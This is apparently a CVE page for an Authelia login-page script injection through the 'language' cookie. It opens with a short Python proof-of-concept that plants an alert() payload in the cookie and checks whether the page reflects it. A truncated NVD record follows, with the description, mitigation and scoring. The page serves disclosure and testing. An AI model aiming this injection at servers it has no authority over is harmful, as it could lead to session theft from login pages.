CVE-2026-33525

import requests target_url = "https://authelia.example.com/" # Malicious payload to inject via the language cookie # In a real scenario, this would be a more complex payload to steal cookies or perform actions. payload = "<script>alert('CVE-2026-33525');</script>" # Create a session to manage cookies session = requests.Session() # Set the malicious 'language' cookie session.cookies.set('language', payload, domain='authelia.example.com') try: # Send a request to the login page to trigger the rendering response = session.get(target_url) # Check if the payload is reflected in the response (unfiltered) if payload in response.text: print("[+] Vulnerability Confirmed: Payload injected into HTML response.") print("[*] Note: Execution depends on CSP policy configuration.") else: print("[-] Payload not reflected or server patched.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33525", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:14.740", "lastModified": "2026-04-02T18:20:55.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authelia is an open-source authentication and authorization server providing two-factor authentication and single sign-on (SSO) for applications via a web portal. In version 4.39.15, an attacker may potentially be able to inject javascript into the Authelia login page if several conditions are met simultaneously. Unless both the `script-src` and `connect-src` directives have been modified it's almost impossible for this to have a meaningful impact. However if both of these are and they are done so without consideration to their potential impact; there is a are situations where this vulnerability could be exploited. This is caused to the lack of neutralization of the `langauge` cookie value when rendering the HTML template. This vulnerability is likely difficult to discover though fingerprinting due to the way Authelia is designed but it should not be considered impossible. The additional requirement to identify the secondary application is however likely to be significantly harder to identify along side this, but also likely easier to fingerprint. Users should upgrade to 4.39.16 or downgrade to 4.39.14 to mitigate the issue. The overwhelming majority of installations will not be affected and no workarounds are necessary. The default value for the Content Security Policy makes exploiting this weakness completely impossible. It's only possible via the deliberate removal of the Content Security Policy or deliberate inclusion of clearly noted unsafe policies."}, {"lang": "es", "value": "Authelia es un servidor de autenticación y autorización de código abierto que proporciona autenticación de dos factores e inicio de sesión único (SSO) para aplicaciones a través de un portal web. En la versión 4.39.15, un atacante podría potencialmente inyectar javascript en la página de inicio de sesión de Authelia si se cumplen varias condiciones simultáneamente. A menos que se hayan modificado las directivas 'script-src' y 'connect-src', es casi imposible que esto tenga un impacto significativo. Sin embargo, si ambas lo están y se hacen sin considerar su impacto potencial; hay situaciones en las que esta vulnerabilidad podría ser explotada. Esto se debe a la falta de neutralización del valor de la cookie 'langauge' al renderizar la plantilla HTML. Es probable que esta vulnerabilidad sea difícil de descubrir mediante la toma de huellas digitales debido a la forma en que está diseñada Authelia, pero no debe considerarse imposible. El requisito adicional para identificar la aplicación secundaria, sin embargo, es probable que sea significativamente más difícil de identificar junto con esto, pero también probablemente más fácil de identificar mediante la toma de huellas digitales. Los usuarios deben actualizar a la versión 4.39.16 o degradar a la 4.39.14 para mitigar el problema. La abrumadora mayoría de las instalaciones no se verán afectadas y no son necesarias soluciones alternativas. El valor predeterminado de la Política de Seguridad de Contenido (Content Security Policy) hace que explotar esta debilidad sea completamente imposible. Solo es posible mediante la eliminación deliberada de la Política de Seguridad de Contenido o la inclusión deliberada de políticas inseguras claramente señaladas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.5, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEff ... (truncated)